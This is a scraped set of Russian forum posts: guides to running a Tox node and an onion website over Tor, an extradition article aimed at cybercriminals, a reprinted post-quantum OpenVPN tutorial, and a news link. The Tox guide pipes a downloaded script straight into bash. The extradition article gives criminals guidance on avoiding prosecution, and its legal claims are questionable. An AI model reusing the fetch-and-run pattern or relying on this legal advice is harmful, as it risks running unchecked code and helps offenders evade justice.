Каждый клиент в Tox сети, использует UDP и выступает в качестве узла связи, передающих информацию. Тем не менее, пользователи не всегда могут войти в "начальную стадию загрузки узла", особенно в случае использования Tor. Эти узлы действуют как каталог для согласования, и являются сходным местом, для поиска других участников.
Запустив tox-bootstrapd, вы помогаете другим пользователям. Кроме того, узлы связываются по протоколу TCP 443 и пару других портов, чтобы помочь в подключении и перенаправлении на сверстников, это делает TOX быстрее в сетях Tor, увеливая анонимность в разы! По сути он будет являться еще одной сетью поверх Tor.

Подключаем репозиторий:
-от root
Код:
wget -qO - https://repo.tox.im/toxbuild.pgp | apt-key add -
_-без root

Код:
wget -qO - https://repo.tox.im/tox-apt.sh | bash_

Код:
apt-get update

Код:
apt-get install tox-bootstrapd

И

Код:
/etc/init.d/tox-bootstrapd start

Теперь подключим нашу ноду к сети Tor:
Код:
HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 443 ip сервера ноды:443

Сайт в сети TOR с помощью Kali Linux

Установить старую версию <http://iso.linuxquestions.org/kali-linux/kali-

linux-1.0.6/> (ссылку на скачивание предоставил, запускать советую на дедике), к примеру 1.0.6. Далее устанавливаем и распаковываем Shallot следующими командами.

Код:
wget https://github.com/katmagic/Shallot/archive/master.zip

unzip master.zip
Переходим в созданную директорию и запускаем сборку командами
Код:
cd Shallot-master

./configure

make
Теперь установим непосредственно Tor и lighttpd
Код:
apt-get install tor

apt-get install lighttpd

Настройка:

На данном этапе нужно сначала получить домен. Делается это командой
Код:
./shallot ^codered

Создастся что-то на подобии coderedkpdsto4wxhr.onion и приватный ключ к нему. Вместо codered можно вставить любое название.

Далее запускаем Tor и lighttpd

Код:
service tor start

service lighttpd start

В файле /etc/tor/torrc нужно будет добавить такие строки

Код:
HiddenServiceDir /var/lib/tor/hidden_service/

HiddenServicePort 80 127.0.0.1:8080
В последней вместо локального ip можно внести внешний. Также желательно добавить эту строку
Код:
ExcludeNodes {ru}, {ua}, {be}
Теперь по пути /var/lib/tor/hiddenservice в файл hostname нужно вписать полученный ранее домен, а в privatekey - приватный ключ.
Остается только в файле /etc/lighttpd/lighttpd.conf поменять параметры на подобные
Код:
server.document-root = "/var/www/"

server.error-handler-404 = "/404.html"

server.tag = "Ваше значение"

server.port = 8080 $HTTP["remoteip"] !~ "127.0.0.1" { url.access-deny = ( "" ) }

server.dir-listing = "disable"
Почти готово, нужно только создать веб-страницы index.html и 404.html в папке /var/www/, соответственно. Теперь при переходе по сгенерированному ранее адресу будет открываться созданный сайт. Стоит добавить, что в lighttpd можно уставить множество дополнительных модулей, тем самым модифицировать сайт.

Экстрадиция миф или реальность?

ID: 676533bbb4103b69df371bd8
Thread ID: 54055
Created: 2021-07-15T20:53:37+0000
Last Post: 2021-07-15T20:53:37+0000
Author: temshikmgimo
Prefix: Статья
Replies: 0 Views: 2K

Ну что, уважаемый читатель, приветствую тебя! Надеюсь, все у тебя хорошо, кадило крутиться лавэшка мутится как говорится) Это цикл статей направленные на расширение твоих юридических знаний.

Предыдущие статьи:

1-https://xss.is/threads/52396/

2- https://xss.is/threads/53582/#post-344928

Сегодня расскажу тебе, об экстрадиции, данная тема сейчас особенно актуальна стала, думаю понимаешь после каких событий.
Маленький спойлер, Россия является членом Европейской Конвенции об экстрадиции 1957 г.
Она подписала эту Конвенцию с оговорками, запрещающими выдачу российских граждан. Статья 61 Конституции РФ гласит, что «гражданин Российской Федерации не может быть выслан за пределы Российской Федерации или выдан другому государству.

А что делать тем, кто не живет в России? И ещё вагон и маленькая тележка вопросов, не ссы, сейчас все расскажу)

Большинство стран мира условно поддерживает инициативу по выдаче и возвращению лиц, совершивших преступление на территории своего родного государства. В реальности они крайне редко могут прийти к единому мнению и договориться между собой. Именно поэтому список стран, где нет экстрадиции в Россию, по-прежнему остается достаточно обширным.
Экстрадиция представляет собой особый вид соглашения, которое заключается между двумя государствами и предполагает выполнение взаимовыгодных обязательств по отношению к плохим дядькам и теткам.
В рамках международного законодательства подобная система была бы идеальным решением в борьбе с международной преступностью, анонимусами и прочими персонажами.
На практике из-за постоянных недомолвок между государствами и большого количества условностей, механизм экстрадиции функционирует крайне нестабильно.

В объединенной Европе, страны которой придерживаются общего курса развития и имеют одинаковые культурные ценности, он реализовывается примерно на 40-50%.
В свою очередь, по отношению к России он соблюдается всего в 10-15% случаев.
В международном законодательстве экстрадиция закреплена как право (именно право, а не обязанность) конкретной страны передавать лиц, совершивших преступление, другому государству.
В связи с этим, каждая страна может интерпретировать его в свете своих потребностей и исходя из существующих взаимоотношений.
Подобный механизм работает более-менее слаженно лишь в том случае, когда между государствами заключен двухсторонний договор об экстрадиции. В таком случае, выдача преступников становится не правом, а обязанностью обеих сторон.

Подавляющее большинство государств объединенной Европы успешно взаимодействует между собой, стараясь совместными усилиями бороться с международной преступностью. В целом, страна может настаивать на выполнении права экстрадиции при соблюдении следующих условий:

1)преступление было совершено на её территории;

2)фигурантом дела является её гражданин;

3)последствия преступных действий нанесли ущерб государству или его гражданам.

При соблюдении всех этих критериев любое государство может претендовать на выдачу лица, совершившего преступные деяния.

Для этого оно должно обратиться с официальным запросом к стране, в которой скрывается правонарушитель. Только после согласования всех юридических вопросов он объявляется в розыск и подлежит аресту.
На сегодняшний день договор об экстрадиции с Россией заключён у 65 стран, что составляет 32% от общей численности мировых держав. Исходя из этого можно заключить, что оставшиеся страны не выдают преступников.
Для поддержания порядка и решения спорных международных вопросов существует специальная организация, именуемая Интерполом. Именно она берёт на себя роль мирового полицейского, который при посильном содействии других стран пытается вернуть сбежавших преступников на Родину.

Из 188 мировых держав преступников в Россию возвращают далеко не все. Со своей стороны РФ возвращает беглецов в 65 государств.
С каждым годом соотношение полученных и отправленных преступников становится всё больше.
В первую очередь, подобная ситуация обусловлена отсутствием двухстороннего соглашения об экстрадиции.

Список стран, которые не выдают правонарушителей России, выглядит следующим образом:

Великобритания;

Украина;

Китай;

Литва;

Латвия;

Эстония;

Швеция;

Япония;

США.

Приведу примеры как все работает и как ловят наших парней, вместо того, чтобы объявлять некоего «российского хакера» в международный розыск, можно провести расследование, собрать доказательства, довести дело до суда (при необходимости направив в Россию запрос об оказании правовой помощи по уголовному делу) и передать материалы в РФ, где для злоумышленника будет избрано соответствующее наказание.

Однако Соединенные Штаты практически никогда не передают российским властям даже информацию об обвинениях, выдвинутых против наших соотечественников, а просто объявляют их в международный розыск по каналам Интерпола и ждут, пока они появится на территории одного из государств, с которым у США заключен договор о выдаче. И увы примеров выдачи российских граждан американским властям достаточно, тот же Женя Никулин, из последних Тюрин Андрей и кучу других ребят. Но, есть конечно же и не успешные кейсы в этом направлении , когда хакеры оставались в РФ и работают теперь на государство( кто понял, тот понял о ком я ) Но это не значит, что так будет всегда, просто стечение обстоятельств и всегда и всем будет так везти, хмм если это конечно можно назвать везением..

Выводы такие, что

Экстрадиция является далеко не совершенным инструментом контроля за уровнем международной преступности. Лишь при заключении двухстороннего соглашения между государствами её механизм функционирует более-менее исправно.

В других случая выдача преступников осуществляется крайне сложно, а то и не производится вовсе.

P/s Мораль такова, чтобы ты уехал косить траву на американских газонах , с каким нибудь Бобби в оранжевой робе, ты должен наделать много шума и <заработать> много кэша, а так ты никому не нужен, но не забывай, бывает что и палка стреляет)

Постквантовый VPN. Ставим OpenVPN с защитой от будущих угроз

ID: 676533bbb4103b69df371bdb
Thread ID: 53452
Created: 2021-06-29T21:50:15+0000
Last Post: 2021-06-29T21:50:15+0000
Author: baykal
Prefix: Статья
Replies: 0 Views: 2K

О квантовых компьютерах говорят еще с восьмидесятых годов. И хотя с ними до сих пор мало кто сталкивался, они все же постепенно становятся реальностью и начинают угрожать традиционной криптографии. В ответ на это появились постквантовые алгоритмы шифрования. В статье я покажу, как они используются в OpenVPN, а заодно обсудим общее положение дел в мире квантовых технологий.

Всякий, кто желает обеспечить защиту своих данных дольше десяти лет, должен сейчас перейти на альтернативные формы шифрования.
Арвинд Кришна, директор исследовательского подразделения IBM (в настоящее время президент и генеральный директор IBM)

Click to expand...

В марте 2018 года ученые из Google объявили о создании 72-кубитного компьютера [Bristlecone](https://ai.googleblog.com/2018/03/a-preview-of-bristlecone- googles-new.html). Параметры компьютера точно неизвестны. Видимо, они были неидеальны, потому что о квантовом превосходстве в Google заговорили лишь в октябре 2019 года, а достичь его удалось на 53-кубитном компьютере Sycamore.

За 200 секунд Sycamore получил результат, который классический суперкомпьютер искал бы 10 тысяч лет. Хотя в Intel компьютерное превосходство Google оспорили и в целом оказалось, что задача была искусственно составлена под результат, стало ясно, что в районе 50+ кубит находится граница, за которой квантовый компьютер может «побить» классический. Правда, только в узком классе специфических задач.

В конце 2020 года китайские исследователи из Научно‑технического университета Китая объявили о решении на их квантовом компьютере задачи, которая в принципе не может быть решена на классическом компьютере, поскольку для этого потребовалось бы время, равное половине жизни Земли.

Исследователи из IBM в то же время заявили, что уже в 2021 году планируют построить квантовый компьютер с 127 кубитами, в 2022 году они надеются иметь 433 кубита, в 2023 году 1121 кубит, а далее они видят перспективу дойти аж до миллиона кубитов и более. Планов громадье!

Проблема, однако, не только в количестве кубитов. При работе квантовых вентилей, то есть при выполнении унитарных операций над кубитами, неизбежно возникают ошибки. Их вероятность невелика, но не нулевая. В процессе вычислений ошибки накапливаются, и без коррекции трудно получить правильный результат. Под действием окружающей среды происходит декогеренция системы, то есть разрушение ее квантового состояния (состояния запутанности кубитов изолированной системы).

Время декогеренции, то есть время поддержания системы кубитов изолированной от окружающей среды, — принципиальный фактор при построении большого квантового компьютера. Если это время меньше времени, необходимого для квантовых вычислений, в системе при вычислении возникают ошибки и в результате вычислений мы получим только рандомизированный шум. Изоляция системы, уменьшение уровня ошибок на вентилях и создание эффективных алгоритмов, корректирующих ошибки, — эти направления работы становятся в последнее время приоритетными и активно разрабытываются в ведущих исследовательских центрах.

Чтобы корректировать ошибки, в квантовых алгоритмах применяются логические кубиты, состоящие из нескольких физических кубитов. Состояние единичного кубита кодируется в перепутанных состояниях нескольких кубитов. Поэтому в квантовом компьютере с коррекцией ошибок реальных кубитов потребуется намного больше. Например, один из первых предложенных для коррекции ошибок 7-кубитовый код Стина (Stean) использует семь кубитов для хранения одной единицы (кубита) квантовой информации.

Параллельно с работой над физической реализацией квантового компьютера разрабатываются квантовые алгоритмы. На прилавках уже появились научно‑популярные брошюры, помогающие всем желающим начать изучать основы квантового программирования. Особое место занимает проект IBM Quantum Experience, позволяющий создавать квантовые алгоритмы и запускать их на квантовых компьютерах IBM и симуляторах.

ПРИЧЕМ ЗДЕСЬ КРИПТОГРАФИЯ?

Квантовый компьютер рационально использовать для решения очень небольшого класса задач. Это моделирование квантовых систем. Например, в химии это расчеты химических реакций или расчеты пространственной структуры молекул при создании новых материалов или лекарств. Это задачи оптимизации, например в расчетах сложной логистики (типа задачи коммивояжера). Это криптоанализ существующих шифров.

Именно публикация алгоритма Шора (Shor) в 1994 году, использующего быстрое квантовое преобразование Фурье для факторизации больших чисел, подогрела интерес к квантовому компьютеру, вызвала бум исследований в этой области и направила на их развитие огромные ресурсы.

Есть американская организация [ASC X9](https://x9.org/wp- content/uploads/2020/06/OverviewOfX9v10.pdf), где разрабатывают глобальные финансовые стандарты, в том числе в области криптографической защиты финансовых данных. [Членами](https://x9.org/x9-member-companies/x9-category-a- member-list/) этой организации являются Bank of America, Citigroup, JPMorgan Chase, Федеральная резервная система, платежная система VISA и Агентство национальной безопасности США. Фирма веников не вяжет, как говорят в народе. И вот в январе 2018 года эта структура озаботилась рисками для финансовых организаций от квантового компьютера и в начале 2019 года выпустила информационный отчет [ASC X9 IR 01—2019](https://x9.org/wp- content/uploads/2019/03/X9_Quantum-Computing-Risk- Study-2019-02-14-finalS1.pdf). Отчет приводит такую логику: если предположить, что к 2028 году ожидается появление квантового компьютера, способного взломать защиту, например, пластиковых карт, рассчитанных на пять лет использования, то применение классической криптографии должно быть прекращено и защита переведена на квантово устойчивую криптографию как минимум за пять лет до потенциальной атаки. Если учесть время на переход от классики к постквантовой криптографии, то переход должен быть начат уже сейчас.

С оговорками и без окончательных выводов, в информационном отчете оценивается ежегодный прирост числа кубитов в 35%. Не закон Мура, но все же. Такими темпами тысячекубитный квантовый компьютер может быть сделан через семь‑восемь лет. Но на самом деле для обоснованного прогноза пока очень мало данных.
![](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19343%2Fimg4.jpg&hash=69ef8528d18454e9fd96a39703e509db)
Примечательно, что в АНБ изменили рекомендации по шифронаборам для защиты информации. Из так называемого Suite B (сейчас это [CNSA Suite](https://apps.nsa.gov/iaarchive/programs/iad-initiatives/cnsa- suite.cfm)) исчезла Curve P-256 для ECDH и ECDSA, хотя модули 3072 bit для RSA остались.
![Алгоритмы NSA Suite B в зависимости от криптостойкости и уровня секретности в прежних публикациях](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19352%2Ftablitsa-1_vaTufQR.jpg&hash=36289c582da7815387d3442105a06457)
Алгоритмы NSA Suite B в зависимости от криптостойкости и уровня секретности в прежних публикациях

А ведь всегда считалось, что по криптостойкости P-256 и RSA-3072 равны и соответствуют стойкости симметричного алгоритма AES-128.
![Сравнительная стойкость криптоалгоритмов в прежних публикациях NIST](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19353%2Ftablitsa-2_aVpIo2p.jpg&hash=3486a5248494b565dc323ea34253167e)
Сравнительная стойкость криптоалгоритмов в прежних публикациях NIST

Но AES-128 хотя бы для SECRET в обновленном Suite B тоже нет, только AES-256 для TOP SECRET. В FAQ АНБ и Центральной службы безопасности (CSS) Минобороны США по CNSA Suite и квантовым вычислениям MFQ-U-OO-815099-15 четко разъяснено, что в национальных системах безопасности (NSS) следующие алгоритмы, ранее одобренные для SECRET, не должны использоваться:

ECDH and ECDSA with NIST P-256;

SHA-256;

AES-128;

RSA with 2048-bit keys;

Diffie-Hellman with 2048-bit keys.

Таким образом, CNSA Suite сейчас включает в себя следующие алгоритмы (отдельно подчеркнуто, что до момента, когда будут разработаны квантово устойчивые алгоритмы).
![Рекомендованные NSA алгоритмы](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19354%2Ftablitsa-3_b3UOuUm.jpg&hash=d70032356fd683446fe845063c283888)
Рекомендованные NSA алгоритмы

Если это связать с оптимистичными прогнозами о разработке квантовых компьютеров, то можно построить правдоподобную версию. Так, в 2017 году исследователи из Microsoft Research опубликовали статью, в которой дали следующую оценку: для вычисления дискретного логарифма на стандартной эллиптической кривой P-256 над конечным полем достаточно 2330 кубитов, в то время как для факторизации RSA с модулем 3072 необходимо 6146 кубитов, то есть почти в три раза больше.

Получается, что для квантовых вычислений P-256 и RSA-3072 по криптографической стойкости совсем не равны. В АНБ, вероятно, могли получить аналогичные данные ранее, при этом мы не можем исключить существование более глубокой оптимизации алгоритма Шора для эллиптических кривых.

Если в течение десяти лет будет построен квантовый компьютер с 2300+ кубитами, он, предположительно, сможет с помощью алгоритма Шора взломать короткие ключи ECC, начиная с 256-битовых ключей, а с помощью алгоритма Гровера (Grover), решающего задачу перебора, ослабить примерно в два раза симметричные ключи AES. То есть криптостойкость AES-128 уменьшится до 264 операций, что в обозримом будущем может оказаться неприемлемым. Криптостойкость же AES-256, снизившись до 2128 операций, останется достаточной, поскольку сегодня считается, что выполнение 2128 операций недостижимо.

Вот любопытный пример того, как идет работа над совершенствованием квантовых алгоритмов. В конце 2015 года вышла статья «Оценка квантовых ресурсов для применения алгоритма Гровера к AES», и расчеты авторов показывали, что для взлома AES-128 необходимо 2953 кубита (второй столбец таблицы ниже).

А в 2019-м исследователи из солнечной Флориды оптимизировали квантовый алгоритм и рассчитали, что для взлома AES-128 необходимо лишь 865 кубитов (третий столбец таблицы).

Представляется, однако, что, даже когда будет тысячекубитный квантовый компьютер, необходимое для атаки огромное количество вычислений окажется пока практически неподъемным. И понятно, почему АНБ оставило RSA-3072: такой длины ключ пока также будет стойким.
![Иллюстрация возможностей оптимизации квантового алгоритма Гровера для взлома AES](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2F96518ecbbb4af8f609be1b10515e50e7%2F19425%2Ftablitsa-4.jpg&hash=29baee7c55d27b0fcab988ece2f11b7b)
Иллюстрация возможностей оптимизации квантового алгоритма Гровера для взлома AES

Но самый любопытный и интригующий пассаж в отчете ASC X9 следующий. На момент публикации отчета самый большой квантовый компьютер имел 72 кубита. Однако, как указывают авторы отчета, есть мнение, что более мощные квантовые компьютеры существуют, но информация о них не опубликована. Авторы полагают, что могут существовать квантовые компьютеры примерно со 100 кубитами!

Заметь также, что речь идет не об одном квантовом компьютере, а о компьютерах во множественном числе, то есть их может быть как минимум два. Конспирология может косвенно подтверждаться данными, содержащимися в [обзоре](https://cyberleninka.ru/article/n/harakteristika-amerikanskih- voennyh-programm-issledovaniy-v-oblasti-kvantovyh-vychisleniy) о потенциальном военном применении квантового компьютера. Но это открытые данные, и не самые последние. Не исключено, что есть еще и скрытая часть айсберга.

Неудивительно, что в 2016 году Национальный институт стандартов и технологий США (NIST) объявил конкурс постквантовых алгоритмов для стандартизации. Уже прошло два этапа конкурса, для участия в [третьем этапе](https://csrc.nist.gov/Projects/post-quantum- cryptography/round-3-submissions) отобрано семь основных алгоритмов и восемь альтернативных.
![Финалисты второго этапа конкурса NIST и альтернативные кандидаты](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19356%2Ftablitsa-5_cZoB5Q3.jpg&hash=94fea788c1898acc1a0811a290dbb9a0)
Финалисты второго этапа конкурса NIST и альтернативные кандидаты

Как ожидается, итоги третьего этапа будут подведены к середине 2022 года. Один‑два алгоритма для обмена ключами и для подписи могут стать стандартами для США. Не исключен и четвертый этап, где могут быть выбраны алгоритмы для применения в специальных областях. Пока же работа идет: проводятся семинары, представленные алгоритмы дорабатываются, разрабатываются и совершенствуются атаки на алгоритмы.

ПОСТКВАНТОВЫЙ VPN

Одновременно с алгоритмами спешно разрабатывают и приложения, которые их реализуют. Развивается и поддерживается проект Open Quantum Safe (OQS). В его рамках создана библиотека liboqs, включающая ряд постквантовых алгоритмов (они приведены на схеме ниже). Библиотека интегрирована в OpenSSL и некоторые другие приложения.

В Microsoft запустили свой проект [Post-quantum Cryptography](https://www.microsoft.com/en-us/research/project/post-quantum- cryptography/) и разрабатывают алгоритмы FrodoKEM, SIKE, Picnic и qTESLA, а также приложения Post-Quantum Crypto VPN, Post-Quantum TLS и Post-Quantum SSH.

Теперь каждый желающий может взять и установить у себя постквантовую OpenVPN. Пока, как предупреждают разработчики, только в экспериментальных целях и для тестирования, поскольку приложение еще не прошло строгого аудита и в нем могут быть ошибки. Да и сами алгоритмы официально не сертифицированы. Но на свой страх и риск — пожалуйста.

![Упрощенная структура проектов, реализующих постквантовые алгоритмы](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19351%2Fimg5_kRfTzqG.jpg&hash=891e53ec61679b16f0a815667d9fb923)
Упрощенная структура проектов, реализующих постквантовые алгоритмы

Самый простой путь установить постквантовую OpenVPN — это взять готовые файлы у Microsoft. Есть версии для [Windows](https://github.com/microsoft/PQCrypto- VPN/releases/download/PQCrypto-1.3/openvpn-install-2.4.9-I601-Win10.exe) и для [Linux](https://github.com/microsoft/PQCrypto- VPN/releases/download/PQCrypto-1.3/pq-openvpn-linux-staged.tar.gz).

В Linux архив можно распаковать прямо в корень файловой системы (на боевой системе так делать не стоит, но для виртуалки пойдет):

Code:Copy to clipboard

# mv pq-openvpn-linux-staged.tar.gz / # tar -xvf pq-openvpn-linux-staged.tar.gz

Архив распакуется, разместив бинарник в /usr/local/openvpn и скрипт pq- openvpn.service в /etc/systemd/system.

Все настройки постквантовой OpenVPN аналогичны обычной OpenVPN, поэтому я не буду слишком распространяться. Разве что замечу, что в конфигурационном файле сервера и клиента обязательно необходимо задать директиву ecdh-curve, иначе обмен ключами будет классический, а не квантовый. Дефолт ecdh-curve p256_sikep434 (гибридный алгоритм первого уровня криптостойкости), но его все равно нужно указать.

На странице [microsoft/PQCrypto-VPN](https://github.com/microsoft/PQCrypto- VPN) на GitHub указано, что поддерживаются только алгоритмы Frodo и SIDH. Да, поддерживаются, но у меня клиент на Windows 10 c директивой в конфиге ecdh- curve frodo1344shake выдает ошибку чтения памяти. Это, конечно, может быть связано с конкретной конфигурацией моей операционной системы, драйверами или с особенностями материнской платы. А вот с алгоритмами frodo1344aes, frodo976shake, frodo640shake и другими этого семейства, включая гибридные алгоритмы, соединение происходит без замечаний. Экспериментируя, я попробовал разные алгоритмы для обмена ключами, в частности, работают явно не заявленные Microsoft гибридные алгоритмы p521_firesiber, p521_ntru_hps4096821 (соответственно, и чистые постквантовые, без классической кривой, тоже работают).

Не забывай, что постквантовые алгоритмы в этой реализации PQCrypto-VPN работают только для TLSv1.3, поэтому в конфигах сервера и клиента следует явно прописать tls-version-min 1.3.

Разработчик утверждает, что после соединения есть только один метод удостовериться, что обмен ключами состоялся с использованием постквантового алгоритма. На сервере в логе необходимо найти group_id:

Code:Copy to clipboard

Control Channel: TLSv1.3, cipher TLSv1.3 TLS_CHACHA20_POLY1305_SHA256, group_id 1278 (post-quantum key exchange)

![Постквантовый алгоритм обмена ключами работает!](/proxy.php?image=https%3A%2F%2Fst768.s3.eu- central-1.amazonaws.com%2Fcaa91c0bb0615ff2f3e3da338909e718%2F19345%2Fimg6.jpg&hash=f12bb8651c2a0ae11adcec9c376178bf)
Постквантовый алгоритм обмена ключами работает!

На скриншоте лога сервера эта строчка подчеркнута. Видно, что постквантовый алгоритм обмена ключами задействован, о чем свидетельствует строка post- quantum key exchange, иначе было бы NOT post-quantum key exchange. В данном случае group_id 1278 (NID OpenSSL) соотносится с обменом ключами, заданным в директиве конфига OpenVPN ecdh-curve p521_firesaber. То есть это гибридный алгоритм, состоящий из классического обмена ключами по протоколу Диффи — Хеллмана на эллиптической кривой P-521 и постквантового механизма инкапсуляции ключа FireSaber-KEM.

FireSaber-KEM соответствует пятому уровню криптостойкости и основан на трудности решения модульной задачи обучения с округлением (Module Learning with Rounding — MLWR), которая представляет собой вариант задачи обучения с ошибками (Learning With Erros — LWR). Она, в свою очередь, восходит к криптографии на решетках. Поговаривают, что в NIST криптографию на решетках любят больше всего.

ПОСТКВАНТОВЫЙ OPENSSL

Пара слов об аутентификации на сервере при помощи сертификатов. Это могут быть как ключевые пары, основанные на классических криптографических алгоритмах, так и постквантовые схемы, а также гибридные. На странице проекта заявлены алгоритмы Picnic и qTESLA. Но можно задействовать и другие алгоритмы, включенные в постквантовый форк OpenSSL (QQS-OpenSSL).

Далее я расскажу, как установить [QQS-OpenSSL](https://github.com/open- quantum-safe/openssl) на Debian 8.9.0.

Для начала понадобятся зависимости:

Code:Copy to clipboard

# apt install cmake gcc libtool libssl-dev make ninja-build git python3-pytest python3-pytest-xdist unzip xsltproc doxygen graphviz

Далее клонируем код OQS-OpenSSL:

Code:Copy to clipboard

$ git clone --branch OQS-OpenSSL_1_1_1-stable https://github.com/open-quantum-safe/openssl.git OQS-OpenSSL

Клонируем и устанавливаем библиотеку liboqs (указав каталог с QQS-OpenSSL в четвертой команде):

Code:Copy to clipboard

$ git clone --branch main https://github.com/open-quantum-safe/liboqs.git $ cd liboqs $ mkdir build && cd build $ cmake -GNinja -DCMAKE_INSTALL_PREFIX=/путь/до/OQS-OpenSSL/oqs $ ninja # ninja install

Переходим в каталог QQS-OpenSSL и запускаем сборку:

Code:Copy to clipboard

$ ./Configure no-shared linux-x86_64 -lm $ make

Все. Дальше можно генерировать постквантовые ключи и выпускать сертификаты.

Если есть потребность применять алгоритмы подписи, не включенные по умолчанию, то до сборки OQS-OpenSSL в файле oqs-template/generate.yml необходимо для этого алгоритма заменить false на enable и затем выполнить две команды:

Code:Copy to clipboard

$ python3 oqs-template/generate.py $ make generate_crypto_objects

Попробуем в качестве алгоритма подписи picnic_L1_UR. Во‑первых, потому, что после долгой зимы — пикник, во‑вторых, потому, что в этом алгоритме применено преобразование Унру, которое предполагается стойким в модели квантового случайного оракула.

Квантовый случайный оракул — схема, при которой противник может делать квантовые (в суперпозиции) запросы случайному оракулу. Это отличается от более распространенной классической конструкции Фиата — Шамира (Fiat — Shamir transform, FS), которая используется в алгоритмах picnic-L1-FS и аналогичных.

Что касается общей характеристики Picnic, то это алгоритм, основанный на криптографическом протоколе доказательства с нулевым разглашением (Zero- knowledge proof, ZKP). Протокол zk-SNARK того же семейства ZKP, что и Picnic, используется в криптовалюте Zcash, которую разработчики позиционируют как наиболее анонимную, не позволяющую узнать ни сумму транзакции, ни отправителя, ни получателя.

Итак, генерируем ключи по алгоритму picnicl1ur и выпускаем сертификаты. Для удобства в каталоге OQS-OpenSSL создадим подкаталог CERTFICATES и выполняем обычные для OpenSSL команды, изменив только алгоритм ключа:

Code:Copy to clipboard

$ apps/openssl genpkey -algorithm picnicl1ur -out CERTIFICATES/picnic_ca.key $ apps/openssl req -x509 -key CERTIFICATES/picnic_ca.key -out CERTIFICATES/picnic_ca.crt -subj "/CN=Picnic CA" -days 100 -sha512 -config apps/openssl.cnf

Просматриваем сертификат:

Code:Copy to clipboard

$ apps/openssl x509 -noout -text -in CERTIFICATES/picnic_ca.crt

Code:Copy to clipboard

Certificate: Data: Version: 3 (0x2) Serial Number: 45:fd:ea:12:2c:a5:e5:d9:a6:97:46:57:bb:ad:a6:41:f2:d6:e9:ee Signature Algorithm: picnicl1ur Issuer: CN = Picnic CA Validity Not Before: Apr 12 05:48:21 2021 GMT Not After : Jul 21 05:48:21 2021 GMT Subject: CN = Picnic CA Subject Public Key Info: Public Key Algorithm: picnicl1ur picnicl1ur Public-Key: pub: 02:a3:97:fc:dd:2f:5d:83:3c:91:53:bb:af:b1:7f: 75:f1:21:1d:78:e3:f9:ca:fb:3a:61:a5:09:fe:22: d4:72:ac X509v3 extensions: X509v3 Subject Key Identifier: 82:AA:E9:CA:CB:63:4A:F4:78:AC:63:1F:F3:05:6D:64:B9:44:77:2E X509v3 Authority Key Identifier: keyid:82:AA:E9:CA:CB:63:4A:F4:78:AC:63:1F:F3:05:6D:64:B9:44:77:2E X509v3 Basic Constraints: critical CA:TRUE Signature Algorithm: picnicl1ur 21:82:09:59:16:85:a6:68:52:08:68:a6:02:99:aa:a9:90:14:

Далее генерируем ключи и выпускаем сертификаты для сервера и клиентов. Для полезных расширений сертификата сначала создадим файл extensions примерно с таким содержимым:

Code:Copy to clipboard

[server] basicConstraints = CA:FALSE keyUsage = digitalSignature, keyEncipherment extendedKeyUsage = serverAuth subjectAltName = @alt_names [alt_names] DNS = 192.168.3.5 [client] basicConstraints = CA:FALSE keyUsage = digitalSignature, keyEncipherment extendedKeyUsage = clientAuth

И выполняем команды для сервера:

Code:Copy to clipboard

$ apps/openssl req -new -newkey picnicl1ur -keyout CERTIFICATES/server.key -out CERTIFICATES/server.csr -nodes -subj "/CN=mysite.ru" -config apps/openssl.cnf -sha512 $ apps/openssl x509 -req -in CERTIFICATES/server.csr -out CERTIFICATES/server.crt -CA CERTIFICATES/picnic_ca.crt -days 50 -CAkey CERTIFICATES/picnic_ca.key -CAcreateserial -sha512 -extensions server -extfile extensions

Для сертификата клиента аналогично, только пишем client вместо server.

Готовые файлы PQCrypto-VPN алгоритм picnicl1ur не поддерживает, поэтому придется собрать самому. Благо в Microsoft написали скрипт build.py, который все делает автоматически. Необходимые зависимости указаны в начале этого скрипта.

ВЫВОДЫ

После того как постквантовые алгоритмы будут стандартизированы, во всем мире начнется переход на постквантовую криптографию. Браузеры будут переведены на постквантовую криптографию (в Google уже проводили такой эксперимент в Chrome Canary). Переход будет долгий и трудоемкий, поэтому уже появились первые фирмы, предлагающие помощь во внедрении постквантовой криптографии, например PQShield при Оксфордском университете или российская QApp.

автор Андрей Пархоменко
источник хакер.ру

Новый анонимный Linux-дистрибутив Obscurix

ID: 676533bbb4103b69df371be1
Thread ID: 52707
Created: 2021-06-10T00:32:57+0000
Last Post: 2021-06-13T21:46:03+0000
Author: Azrv3l
Replies: 14 Views: 2K

Увидел на habr новость, о новом дистре на основе Arch Linux.

![habr.com](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fgk%2Fad%2Fqj%2Fgkadqjlf0wld_rj- e-u_62pnl7y.jpeg&hash=a1e7850b57f26408948f8c27930f1392&return_error=1)

[ Linux-Ð´Ð¸ÑÑÑÐ¸Ð±ÑÑÐ¸Ð²Ñ Ð´Ð»Ñ Ð°Ð½Ð¾Ð½Ð¸Ð¼Ð½Ð¾Ð¹ ÑÐ°Ð±Ð¾ÑÑ Ð²

Ð¸Ð½ÑÐµÑÐ½ÐµÑÐµÂ â ÑÑÐ¾ Ð½Ð¾Ð²Ð¾Ð³Ð¾? ](https://habr.com/en/company/vdsina/blog/561246/)

